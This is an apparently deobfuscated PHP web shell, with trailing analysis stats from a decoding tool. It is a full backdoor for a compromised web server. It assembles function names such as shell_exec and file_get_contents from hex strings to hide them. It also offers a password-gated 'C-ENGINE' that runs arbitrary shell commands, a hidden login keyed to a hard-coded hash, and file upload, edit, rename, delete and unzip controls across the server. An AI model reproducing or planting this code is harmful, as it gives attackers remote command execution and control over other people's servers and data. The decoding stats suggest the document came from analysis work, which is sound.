<button style="background: transparent; border: 2px solid #eee; padding: 11px; border-radius: 2px;">
F2
</button> :
<button style="background: transparent; border: 2px solid #eee; padding: 11px; border-radius: 2px;">
F3
</button> :
<button style="background: transparent; border: 2px solid #eee; padding: 11px; border-radius: 2px;">
F4
</button> :
<button style="background: #DC0000; color: #eee; font-weight: bold; border: 2px solid #DC0000; padding: 11px; border-radius: 6%;">
</button> :
</div>
<div id="yuzu" style="display: inline">
<button style="background: #1E5128; color: #eee; font-weight: bold; border: 2px solid #1E5128; padding: 11px; border-radius: 6%;" onclick="yuzuDiv()">
<< Yu-Zu >>
</button> :
<div id="yuzuDiv" style="display:none;">
<form method="POST" enctype="multipart/form-data" action="">
<input type="submit" name="upload_file" style="display: none;" id="submit">
<input type="file" class="custom-file-input" name="upload_filename" onchange="document.getElementById('submit').click()">
</form>
:
</div>
</div>
<form method="POST" action="">
<input type="hidden" name="c-engine">
<button style="background: #1E5128; color: #03C988; font-weight: bold; border: 2px solid #1E5128; padding: 11px; border-radius: 6%;">
- <?php if ($_SESSION["engine"] == "admin") { echo "<font style='text-shadow: 0px 0px 5px #000;'color='#fff'>[Tmpv] actived</font>"; } else { echo "<font color='#111'>[Tmpv]</font>"; } ?>
</button>
</form>
</div>
</th>
</tr>
<?php if (isset($_POST["c-engine"])) { if ($_SESSION["engine"] == "admin") { unset($_SESSION["engine"]); } else { unset($_SESSION["engine"]); echo "<tr><td><form method='POST' action='#success'><input type='text' placeholder=' >> C-ENGINE PW' name='pwcmd' ><input type='submit' ></form></td></tr><br>"; } } if (isset($_POST["pwcmd"])) { if ($_POST["pwcmd"] == "337") { $_SESSION["engine"] = "admin"; } } if ($_SESSION["engine"] == "admin") { echo "<td>::: <form method='POST'><input id='cmd' type='text' placeholder=' >> C-ENGINE' name='cengine' style='width:500px;' autofocus> | <button id='cmd' >>></button></form></td>"; } ?>
</table>
<?php if (isset($_POST["cengine"])) { $cmdx = "736865"; $cmdy = "786563"; $xxx = $hb($cmdx) . "ll_e" . $hb($cmdy); $xv = $xxx($_POST["cengine"]); ?>
<table>
<tr>
<td style="font-size: 12px;">
[localhost]~# $ <span style="color: lime;"><?php echo $_POST["cengine"]; ?>
</span>
</td>
</tr>
</table>
<textarea style="width: 1180px; height: 250px; color: #4E9F3D;"><?php echo $xv; ?>
</textarea>
<?php } ?>
</center>
<script>
function toolsDiv() {
var x = document.getElementById("toolsDIV");
var yuzu = document.getElementById("yuzu");
var xx = document.getElementById("yuzuDiv");
if (x.style.display === "none") {
x.style.display = "inline";
yuzu.style.display = "none";
xx.style.display = "none";
} else {
x.style.display = "none";
yuzu.style.display = "inline";
xx.style.display = "none";
}
}
function yuzuDiv() {
var xx = document.getElementById("toolsDIV");
var x = document.getElementById("yuzuDiv");
if (x.style.display === "none") {
x.style.display = "inline";
xx.style.display = "none";
} else {
x.style.display = "none";
xx.style.display = "none";
}
}
</script>
<?php if (!isset($_GET["path"])) { $dir = $gcw(); $path = $bh($dir); $_GET["path"]; $current_file = $hb($_GET["path"]); echo "<center><table style="border: 0;"><tr><td style="padding-left:10px;">Path: </td><td style="padding-left:10px;">"; if ($server !== "WIN") { echo "<a href="?path=2f">/</a></td><td>"; } $dirs = str_replace("\", "/", $dir); $xdir = explode("/", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "<font style="color:#555; font-weight: bold">/</font>"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { echo "<a href="?path="; } else { echo "<a href="?path=2f"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = $bh($xdir[$i] . "/"); $filepath = $xdir[$i] . "/"; $fld = str_replace(" ", '', $filepath); $fld = str_replace("/", '', $filepath); if ($folder_path != "2f") { echo $folder_path; } } echo "">" . $fld . "</a>"; } echo "</tr></td></table></center>"; } else { $path = $_GET["path"]; $dir = $hb($_GET["path"]); $current_file = $hb($_GET["path"]); echo "<center><table style="border: 0;"><tr><td style="padding-left:10px;">Path: </td><td style="padding-left:10px;">"; if ($server !== "WIN") { echo "<a href="?path=2f">/</a></td><td>"; } $dirs = str_replace("\", "/", $dir); $xdir = explode("/", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "<font style="color:#555; font-weight: bold">/</font>"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { echo "<a href="?path="; } else { echo "<a href="?path=2f"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = $bh($xdir[$i] . "/"); $filepath = $xdir[$i] . "/"; $fld = str_replace(" ", '', $filepath); $fld = str_replace("/", '', $filepath); if ($folder_path != "2f") { echo $folder_path; } } echo "">" . $fld . "</a>"; } echo "</tr></td></table></center>"; if (is_file($current_file)) { $dirname = $bh(dirname($current_file)); $my = $current_file; $myrx = str_replace($_SERVER["DOCUMENT_ROOT"], "/", $my); $current_file = str_replace("//", "/", $current_file); ?>
<br>
<center>
<table style="width: 1200px;border-bottom-left-radius: 0px; border-bottom-right-radius: 0px;">
<tr>
<td>
Filename: <a target="_blank" href="<?php echo "//" . $_SERVER["HTTP_HOST"] . "/" . $myrx; ?>
"><?php echo $current_file; ?>
</a>
</td>
</tr>
</table>
<?php $f = "f" . "i" . "l" . "e" . "_" . "g" . "e" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $text = $f($current_file); ?>
<textarea style="width:1180px;height:660px;" readonly><?php echo htmlentities($text); ?>
</textarea><br />
<br><br>
<?php die; } } if (isset($_POST["rename_folder_proccess"])) { rename($_POST["oldfoldername"], $_POST["dirfoldername"] . "/" . $_POST["newfoldername"]); } if (isset($_POST["rename_folder"])) { ?>
<br><br>
<center>
<table>
<tr>
<th><i class="fa-sharp fa-solid fa-hippo"></i> RENAME FOLDER</th>
<th>
dirname:
</th>
<th>
<?php echo dirname($hb($_POST["folderpath"])) . "/"; ?>
</th>
<th width="600px">
<form method="POST">
<input type="hidden" name="dirfoldername" value="<?php echo dirname($hb($_POST["folderpath"])) . "/"; ?>
">
<input type="hidden" name="oldfoldername" value="<?php echo $hb($_POST["folderpath"]); ?>
">
<input type="text" style="font-size: 18px;width:100%" name="newfoldername" value="<?php echo $_POST["foldername"]; ?>
">
</th>
<th>
<input id="crud" type="submit" name="rename_folder_proccess" value="REN">
</form>
</th>
</tr>
</table>
</center>
<?php die; } if (isset($_POST["deletefolder"])) { chmod($hb($_POST["folderpath"], 511)); rmdir($hb($_POST["folderpath"])); } if (isset($_POST["rename_file_proccess"])) { rename($_POST["oldfilename"], $_POST["dirfilename"] . "/" . $_POST["newfilename"]); } if (isset($_POST["rename_file"])) { ?>
<br><br>
<center>
<table>
<tr>
<th><i class="fa-sharp fa-solid fa-hippo"></i> RENAME FILE</th>
<th>
dirname:
</th>
<th>
<?php echo dirname($hb($_POST["filepath"])) . "/"; ?>
</th>
<th width="600px">
<form method="POST">
<input type="hidden" name="dirfilename" value="<?php echo dirname($hb($_POST["filepath"])) . "/"; ?>
">
<input type="hidden" name="oldfilename" value="<?php echo $hb($_POST["filepath"]); ?>
">
<input type="text" style="font-size: 18px;width:100%" name="newfilename" value="<?php echo $_POST["filename"]; ?>
">
</th>
<th>
<input id="crud" type="submit" name="rename_file_proccess" value="REN">
</form>
</th>
</tr>
</table>
</center>
<?php die; } if (isset($_POST["unzip_file"])) { $zip = new ZipArchive(); $res = $zip->open($hb($_POST["filepath"])); if ($res === TRUE) { $zip->extractTo(dirname($hb($_POST["filepath"]))); $zip->close(); echo "<center><table style="background: #00C400;"><tr><td>Successfully Unzip File!</td></tr></table></center>"; } else { echo "<center><table style="background: #DC0000;"><tr><td>Failed to Unzip File!</td></tr></table></center>"; } } if (isset($_POST["deletefile"])) { chmod($hb($_POST["filepath"]), 438); unlink($hb($_POST["filepath"])); } if (isset($_POST["savefile"])) { $file_handler = $ngopen($_POST["filepath"], "w"); $ngwrite($file_handler, $_POST["file_content"]); $ngclose($file_handler); } if (isset($_POST["edit_file"])) { echo "<br><br><br>"; $f = $flg . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $text = $f($hb($_POST["filepath"])); ?>
<center>
<table style="background: #F88000; width: 1200px;border-bottom-left-radius: 0px; border-bottom-right-radius: 0px;">
<tr>
<td>
EDITING FILE: <?php echo $_POST["filename"]; ?>
</td>
</tr>
</table>
<form method="POST">
<textarea style="background:#222; width:1180px;height:500px;color:#00C400;" name="file_content"><?php echo htmlentities($text); ?>
</textarea><br><br />
<input type="hidden" name="filepath" value="<?php echo $hb($_POST["filepath"]); ?>
">
<input type="submit" name="savefile" value="save" style="font-size: 18px;">
</form>
<br><br>
</center>
<?php die; } echo "<br>"; ?>
<?php if (is_dir($dir)) { $isi_dir = scandir($dir); } else { $isi_dir = $current_file; } ?>
<center>
<table style="width: 1200px;">
<tr>
<th style="width: 450px"><i class="fa-sharp fa-solid fa-virus"></i> NAME</th>
<th colspan="4" style="width: 170px;">ACTION</th>
<th style="text-align: right; width: 330px;">SIZE</th>
<th style="width:50px;"></th>
<!--
<th>LAST MODIFIED</th>
<th>FILEPERMS</th>-->
</tr>
<?php foreach ($isi_dir as $x => $foldername) { if (is_dir($dir . "/" . $foldername)) { if ($foldername !== "." & $foldername !== "..") { $folderpath = $bh($dir . "/" . $foldername); ?>
<tr>
<td>
<p>
<i class="fa-solid fa-folder-open" style="color: #888;padding: 5px;"></i>
<a id="filename" href="?path=<?php echo $folderpath; ?>
"><?php echo $foldername; ?>
</a>
</p>
</td>
<td></td>
<td>
<form method="POST">
<input type="hidden" name="folderpath" value="<?php echo $folderpath; ?>
">
<input type="hidden" name="foldername" value="<?php echo $foldername; ?>
">
<input id="crud" type="submit" name="rename_folder" value="REN">
</form>
</td>
<td></td>
<td>
<form method="POST">
<input type="hidden" name="folderpath" value="<?php echo $folderpath; ?>
">
<input type="hidden" name="foldername" value="<?php echo $foldername; ?>
">
<input id="crud" style="color: #DC0000;" type="submit" name="deletefolder" value="DEL">
</form>
</td>
<td align="right" style="color: #555;">DIR <span style="color: #eee;"> |</span></td>
<td><?php $folder_x = str_replace($_SERVER["DOCUMENT_ROOT"], "/", $hb($folderpath)); ?>
<a target="_blank" href="<?php echo "http://" . $_SERVER["HTTP_HOST"] . "/" . $folder_x; ?>
"><i class="fa-sharp fa-solid fa-arrow-up-right-from-square"></i></a>
</td>
</tr>
<?php } } } echo ''; foreach ($isi_dir as $x => $filename) { if (is_file($dir . "/" . $filename)) { if ($filename !== "." & $filename !== "..") { $filepath = $bh($dir . "/" . $filename); ?>
<tr>
<td>
<p>
<i class="fa-solid fa-file-lines" style="color: #888;padding: 5px;"></i>
<a id="filename" href="?path=<?php echo $filepath; ?>
"><?php echo $filename; ?>
</a>
</p>
</td>
<td>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input type="submit" id="crud" name="edit_file" value="EDIT">
</form>
</td>
<td>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input id="crud" type="submit" name="rename_file" value="REN">
</form>
</td>
<td>
<?php $ext = pathinfo($filename, PATHINFO_EXTENSION); if ($ext == "zip") { ?>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input id="crud" type="submit" style="color:#f88000;" name="unzip_file" value="UNZ">
</form>
<?php } ?>
</td>
<td>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input id="crud" style="color: #DC0000;" type="submit" name="deletefile" value="DEL">
</form>
</td>
<td align="right" style="color: #555;">
<?php echo $flz($dir . "/" . $filename); ?>
KB <span style="color: #eee;"> |</span>
</td>
<td><?php $file_x = str_replace($_SERVER["DOCUMENT_ROOT"], "/", $hb($filepath)); $file_x = str_replace("//", "/", $file_x); $file_addr = "http://" . $_SERVER["HTTP_HOST"] . "/" . $file_x; $file_addr = str_replace("///", "/", $file_addr); $file_addr = str_replace("//", "/", $file_addr); ?>
<a target="_blank" href="<?php echo $file_addr; ?>
"><i class="fa-sharp fa-solid fa-arrow-up-right-from-square"></i></a>
</td>
</tr>
<?php } } } echo "</table><table><tr><td style="color: #444;"><i>Pure Coded by PENGABDI STEPMOM</i></tr></td></table></center><br><br /></body>"; } goto aig_F; bbERV: $flz = $hb($fxxx) . "s" . $hb("6" . "97a") . "e"; goto uGS04; lHxpY: $bxx = "n" . "2h"; goto BeEcL; uGS04: $mvfl = $hb("6d6" . "f") . "ve_" . "u" . $hb("70" . "6c6f6164") . "ed_" . $hb($fxxx); goto hy1xm; BRHG8: $ernull = $exxx . $hb($exx) . $exxv . $hb($exv); goto Gg21o; WJOdQ: $md = $hb("6" . "d") . "d" . $hb("3" . "5"); goto EbGfa; aKYwJ: $ss = $ssxxx . $ssxx . $hb($ssx); goto FatQ3; nfBSB: $hb = $hxxx . $hxx . $hx; goto Nrsht; eVF9W: $flg = $hb($fxxx) . "_" . $hb($fgtg); goto pMPuL; pMPuL: $flp = $hb($fxxx) . "_" . $hb($fgtp); goto AMuAE; KHjjM: $exxv = "o"; goto eMYtf; dZaHg: $exx = "725f726570"; goto KHjjM; hy1xm: $ngopen = "f" . $hb("6f" . "70") . "en"; goto suyYJ; JOLCZ: if (isset($_POST["login"])) { $password = $_POST["admin"]; $password = $md($password); $pass = "58186126951b4cf57dddba73dcaf72be"; if ($password == $pass) { $_SESSION["admin"] = "58186126951b4cf57dddba73dcaf72be"; } } goto QSl0R; Q3vyn: $bh = $bxxx . $bxx . $bx; goto XxKlQ; QSl0R: if (isset($_GET["xx"])) { ?>
<form method="POST"><input type="text" name="admin"><input type="submit" name="login"></form>
<?php } goto eSSCC; wB9B7: $hxx = "x" . "2"; goto ZKEHq; Ju0bV: $fgtp = "70" . "7" . "5" . "7" . "4"; goto eVF9W; XxKlQ: $ssxxx = "s" . "e" . $hb("737369") . "on_"; goto mrNFH; suyYJ: $ngwrite = "f" . $hb("777" . "26974") . "e"; goto jESXX; eMYtf: $exv = "7274696e67"; goto BRHG8; FatQ3: $ss(); goto k_Vuc; Pw87n: $shl = $hb($ehs) . "ll_e" . $hb($cex); goto JOLCZ; Gg21o: $ernull(0); goto RMghN; jESXX: $ngclose = "f" . $hb("636" . "c6f73") . "e"; goto WJOdQ; Yn5AG: $exxx = "e" . $hb("72726f"); goto dZaHg; Oo4ox: $cex = "786563"; goto Pw87n; EbGfa: $ehs = "736865"; goto Oo4ox; k_Vuc: $fxxx = "6" . "6" . "69" . "6" . "c" . "6" . "5"; goto yxpmW; BeEcL: $bx = "e" . "x"; goto Q3vyn; ZKEHq: $hx = "b" . "in"; goto nfBSB; RMghN: $ssx = "7274"; goto aKYwJ; bBL5o: $hxxx = "h" . "e"; goto wB9B7; aig_F: ?>
Function Calls
None |
Stats
MD5 | 90c32ae3cb0ffeeb532985bcb6ac70a7 |
Eval Count | 0 |
Decode Time | 65 ms |